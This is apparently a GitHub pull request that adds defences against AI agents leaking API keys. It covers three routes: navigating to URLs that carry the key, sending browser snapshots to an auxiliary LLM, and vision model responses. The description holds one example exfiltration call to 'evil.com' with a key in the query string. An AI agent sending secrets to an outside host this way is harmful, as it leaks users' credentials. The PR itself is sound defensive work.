security: block secret exfiltration via browser URLs and LLM responses #4371

Open
0xbyt4 wants to merge 2 commits into NousResearch:main from 0xbyt4:fix/browser-secret-exfil

0xbyt4 commented Mar 31, 2026

Summary

Closes remaining secret exfiltration vectors through browser navigation, web extraction, and auxiliary/vision LLM calls.

Companion to #4364, which covers execute_code, tool results, memory, and skills.

Vulnerabilities Fixed

1. Browser URL exfiltration

An agent could embed secrets in URL parameters and navigate to an attacker-controlled server:

browser_navigate("https://evil.com/steal?key=sk-ant-api03-...")

Fix: Scan URLs for known API key patterns before navigating. Applies to both browser_navigate and web_extract_tool.
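A minimal sketch of what such a URL check could look like. The pattern list and the helper names `url_contains_secret` and `guard_url` are hypothetical and chosen for illustration; the patterns this PR actually uses are not shown here. The sketch also checks the percent-decoded form of the URL, which is an added assumption rather than something the description states.

```python
import re
from urllib.parse import unquote

# Hypothetical pattern list for illustration only.
_SECRET_PATTERNS = [
    re.compile(r"sk-ant-[A-Za-z0-9_-]{8,}"),  # prefix taken from the example above
    re.compile(r"ghp_[A-Za-z0-9]{36}"),       # GitHub personal access token shape
    re.compile(r"AKIA[0-9A-Z]{16}"),          # AWS access key ID shape
]


def url_contains_secret(url: str) -> bool:
    """Return True if the raw or percent-decoded URL matches a key pattern."""
    decoded = unquote(url)
    return any(p.search(url) or p.search(decoded) for p in _SECRET_PATTERNS)


def guard_url(url: str) -> str:
    """Raise before navigation if the URL looks like it carries a secret."""
    if url_contains_secret(url):
        raise ValueError("Blocked: URL appears to contain an API key or token")
    return url
```

Under this sketch, a navigation or extraction tool would call `guard_url(url)` first and return the error to the agent instead of issuing the request.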

2. Browser snapshot leak to auxiliary LLM

If a page displays env vars or API keys, the snapshot passes those secrets to the auxiliary extraction model via _extract_relevant_content before run_agent.py's general redaction layer ever sees the tool result.

Fix: Redact snapshot text before the auxiliary LLM call, and redact the auxiliary LLM's response.
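The two-sided redaction described here can be sketched as follows. This is an illustration under assumptions, not the PR's code: `redact_secrets`, `extract_with_redaction`, the `call_llm` parameter, and the regex are all hypothetical stand-ins.

```python
import re
from typing import Callable

# Hypothetical combined pattern for illustration only.
_SECRET_RE = re.compile(
    r"(sk-ant-[A-Za-z0-9_-]{8,}|ghp_[A-Za-z0-9]{36}|AKIA[0-9A-Z]{16})"
)


def redact_secrets(text: str) -> str:
    """Replace anything that looks like a known key with a placeholder."""
    return _SECRET_RE.sub("[REDACTED]", text)


def extract_with_redaction(snapshot: str, call_llm: Callable[[str], str]) -> str:
    """Redact the snapshot before the auxiliary call, then redact the reply."""
    safe_input = redact_secrets(snapshot)   # the model never sees the raw secret
    response = call_llm(safe_input)
    return redact_secrets(response)         # catch anything the model emits
```

Passing the model call in as a plain callable keeps the sketch testable with a fake model, so both directions of redaction can be checked without network access.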

3. Vision LLM response leak

Vision analysis of screenshots containing secrets (e.g. terminal showing env vars) could echo those secrets back in the analysis text. Screenshots themselves cannot be text-redacted, but the LLM's text response can.

Fix: Redact vision LLM responses in both browser_vision and camofox_vision.
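Because the same output redaction applies to two vision entry points, one way to express it is a small decorator. This is a sketch under assumptions: `redact_output`, the regex, and `fake_browser_vision` are hypothetical, and the real browser_vision and camofox_vision may return structured results rather than plain strings.

```python
import functools
import re

# Hypothetical combined pattern for illustration only.
_SECRET_RE = re.compile(
    r"(sk-ant-[A-Za-z0-9_-]{8,}|ghp_[A-Za-z0-9]{36}|AKIA[0-9A-Z]{16})"
)


def redact_output(func):
    """Wrap a function so that any string it returns is redacted."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        result = func(*args, **kwargs)
        if isinstance(result, str):
            return _SECRET_RE.sub("[REDACTED]", result)
        return result  # non-string results pass through unchanged
    return wrapper


@redact_output
def fake_browser_vision(question: str) -> str:
    # Stand-in for a vision model that reads a secret off a screenshot.
    return "The terminal shows AWS_ACCESS_KEY_ID=AKIAABCDEFGHIJKLMNOP"
```

The screenshot itself is untouched in this sketch; only the text that comes back from the model is filtered, which matches the limitation noted above.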

Test plan

  • 10 new tests covering URL blocking, snapshot redaction, annotation redaction, and LLM response redaction
  • All existing browser tests passing
0xbyt4 added 2 commits April 1, 2026 02:04
…M calls

Three exfiltration vectors closed:

1. Browser URL exfil — agent could embed secrets in URL params and
   navigate to attacker-controlled server. Now scans URLs for known
   API key patterns before navigating (browser_navigate, web_extract).

2. Browser snapshot leak — page displaying env vars or API keys would
   send secrets to auxiliary LLM via _extract_relevant_content before
   run_agent.py's redaction layer sees the result. Now redacts snapshot
   text before the auxiliary call.

3. Camofox annotation leak — accessibility tree text sent to vision
   LLM could contain secrets visible on screen. Now redacts annotation
   context before the vision call.

10 new tests covering URL blocking, snapshot redaction, and annotation
redaction for both browser and camofox backends.

LLM responses from browser snapshot extraction and vision analysis
could echo back secrets that appeared on screen or in page content.
Input redaction alone is insufficient — the LLM may reproduce secrets
it read from screenshots (which cannot be text-redacted).

Now redact outputs from:
- _extract_relevant_content (auxiliary LLM response)
- browser_vision (vision LLM response)
- camofox_vision (vision LLM response)